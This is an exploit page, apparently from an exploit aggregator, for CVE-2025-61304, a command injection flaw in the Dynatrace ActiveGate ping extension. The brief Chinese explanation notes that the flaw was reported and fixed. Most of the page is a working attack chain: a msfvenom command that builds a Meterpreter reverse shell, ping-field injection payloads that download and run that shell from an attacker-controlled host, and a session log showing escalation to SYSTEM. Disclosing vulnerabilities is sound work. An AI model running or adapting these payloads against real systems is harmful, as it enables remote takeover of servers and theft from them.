Exploit for CVE-2025-61304
2025-10-25 | CVSS 7.9
sploitus.com/exploit?id=…
CVE-2025-61304
"Dynatrace ActiveGate ping扩展最高版本1.016中存在操作系统命令注入漏洞,可通过精心构造的IP地址进行攻击"
在后台,ping扩展使用Windows命令提示符来执行ping操作。测试目标主机的输入字段长度为1024个字符。在IP地址之后,攻击者可以通过使用'&'符号编写附加命令供ActiveGate执行。
已向Dynatrace报告并通过此提交修复: github.com/Dynatrace/d…
利用RCE添加用户的漏洞:
本地用户列表前后对比:
其他示例载荷:
- 创建meterpreter反向shell:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.51.200 LPORT=4444 -f exe > mshell.exe
- 通过云界面使用ping扩展在ActiveGate上下载并执行shell:
google&powershell.exe $ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest http://192.168.51.200/mshell.exe -OutFile c:\test\mshell.exe
google&c:\test\mshell.exe
- 结果会话
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.51.200:4444
[*] Sending stage (200262 bytes) to 192.168.51.54
[*] Meterpreter session 3 opened (192.168.51.200:4444 -> 192.168.51.54:49800 ) at 2023-01-21 19:02:16 +0100
meterpreter > getuid
Server username: NT AUTHORITY\LOCAL SERVICE
meterpreter > getsystem
...got system via technique 5 (Named Pipe Impersonation (PrintSpooler variant)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : WIN-9493M3CRTDV
OS : Windows 2016+ (10.0 Build 17763).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
